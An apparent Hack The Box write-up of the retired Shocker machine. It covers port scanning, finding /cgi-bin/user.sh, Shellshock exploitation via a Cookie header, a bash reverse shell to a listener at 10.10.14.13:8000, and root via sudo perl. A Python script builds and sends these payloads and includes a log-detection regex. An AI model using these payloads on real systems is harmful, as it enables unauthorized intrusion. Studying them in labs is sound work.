Hello everyone, this is my first write-up, so bear with me for any grammatical mistakes.
This write-up is about the retired machine Shocker on the Hack The Box platform.
Let's start hacking.
Nmap scan:
nmap -sC -sV -oA nmap 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see there are only two ports open: port 80, HTTP served by Apache 2.4.18, and port 2222, SSH served by OpenSSH 7.2p2.
Searchsploit:
Running searchsploit against Apache 2.4.18 and OpenSSH 7.2p2 turns up no vulnerability that helps us here.
Nikto scan:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.56
+ Target Hostname: 10.10.10.56
+ Target Port: 80
+ Start Time: (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: (GMT-7) (1998 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The Nikto scan doesn't reveal much either: only missing security headers, an ETag inode leak and the default /icons/README.
dirbuster for directory bruteforce:
We can see a directory that returns a 403, but it is interesting because it is /cgi-bin/. A quick Google search shows that this is the directory from which Apache executes CGI scripts, so any script we find there runs on the server when requested.
So I point dirbuster at http://10.10.10.56/cgi-bin/ and set the file extensions to sh and pl.
Now we can see a file with status code 200: a shell script named user.sh. Browsing to it just prompts a download of user.sh.
BurpSuite:
Let's fire up Burp and capture the request to /cgi-bin/user.sh.
Since user.sh is a CGI script executed by bash, and Apache passes request headers to CGI scripts as environment variables, this is the classic Shellshock (CVE-2014-6271) scenario: a vulnerable bash executes whatever follows a function definition found in any environment variable.
Shell Shock and reverse shell:
Let's add a custom header in Burp to check for Shellshock; simply add
Cookie: () { :; }; echo ; /bin/ls
We can see the response contains user.sh, which means the directory listing ran and we have command execution. Let's go for a reverse shell by putting the same prefix in front of the following command, with a listener waiting on 10.10.14.13 port 8000:
bash -i >& /dev/tcp/10.10.14.13/8000 0>&1
Finally we get a shell as the user shelly.
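As an added example (not the author's code and not from the box), here is a small Python script that builds the probe used above, shows why a Cookie header reaches bash at all (the CGI HTTP_COOKIE mapping), and, for the defender's side, greps Apache access-log lines for the same function prefix. The host, path and listener address are the ones used in this write-up; the log lines are constructed, and the detection regex and its spacing variants are this example's own assumptions.

```python
import http.client
import re
from typing import List

# Target details come from the write-up; the listener address is the one the
# write-up uses for its reverse shell. Everything else here is this example's
# own assumption, not the author's code.
TARGET_HOST = "10.10.10.56"
CGI_PATH = "/cgi-bin/user.sh"
LHOST, LPORT = "10.10.14.13", 8000

# A bash function definition exported through the environment. Vulnerable bash
# (CVE-2014-6271) keeps parsing after the closing brace and executes the rest.
SHELLSHOCK_PREFIX = "() { :; }; "


def build_payload(command: str) -> str:
    """Header value that makes a vulnerable bash CGI run `command`.

    The `echo;` prints an empty line first, so the command output lands in the
    HTTP body instead of being treated as a broken response header.
    """
    return f"{SHELLSHOCK_PREFIX}echo; {command}"


def header_to_cgi_env(header_name: str) -> str:
    """CGI (RFC 3875) maps each request header to HTTP_<NAME>: upper case, '-' -> '_'.

    This is why a Cookie or User-Agent header reaches bash as an environment
    variable and gets parsed for function definitions.
    """
    return "HTTP_" + header_name.upper().replace("-", "_")


def reverse_shell_command(lhost: str, lport: int) -> str:
    """The bash reverse shell from the write-up, parameterised on the listener."""
    return f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def probe(host: str, path: str, command: str = "/bin/ls",
          header: str = "Cookie", timeout: float = 10.0) -> str:
    """Send one request with the payload in `header`; return the response body.

    Needs network access to the target; not exercised offline.
    """
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("GET", path, headers={header: build_payload(command)})
        return conn.getresponse().read().decode(errors="replace")
    finally:
        conn.close()


# Defender side: the same function-definition prefix is what to hunt for in
# Apache access logs. Matches "() { :; };" and spacing variants like "() {:;};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:\s*;\s*\}\s*;")


def find_shellshock_attempts(log_lines: List[str]) -> List[str]:
    """Return the access-log lines carrying a Shellshock function prefix."""
    return [line for line in log_lines if SHELLSHOCK_RE.search(line)]


# Constructed access-log lines in Apache "combined" format (not real logs).
# Only the User-Agent is logged by default: a payload sent in Cookie, as in the
# write-up, leaves no trace here, which is a caveat for anyone relying on logs.
SAMPLE_LOG = [
    '10.10.14.13 - - [21/Oct/2017:10:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; /bin/ls"',
    '10.10.14.13 - - [21/Oct/2017:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.14.13 - - [21/Oct/2017:10:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() {:;}; echo; /bin/bash -i >& /dev/tcp/10.10.14.13/8000 0>&1"',
]

if __name__ == "__main__":
    print("Cookie is exported to the script as", header_to_cgi_env("Cookie"))
    print("Probe header value:", build_payload("/bin/ls"))
    print("Reverse shell header value:", build_payload(reverse_shell_command(LHOST, LPORT)))
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print("Shellshock attempt in log:", hit)
    # Uncomment on the lab network to fire the probe at the box:
    # print(probe(TARGET_HOST, CGI_PATH))
```

Putting the payload in User-Agent instead of Cookie works just as well against the box, but it is the variant a defender will actually find in the access log; the Cookie variant used above only shows up if the server logs that header or a WAF inspects it.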
Privilege Escalation:
When I run sudo -l,
it shows that the user can execute /usr/bin/perl as root without a password. Let's use this misconfiguration to gain root: perl can spawn a shell, and a shell spawned by a root perl process is a root shell.
Now we finally have root access to the box.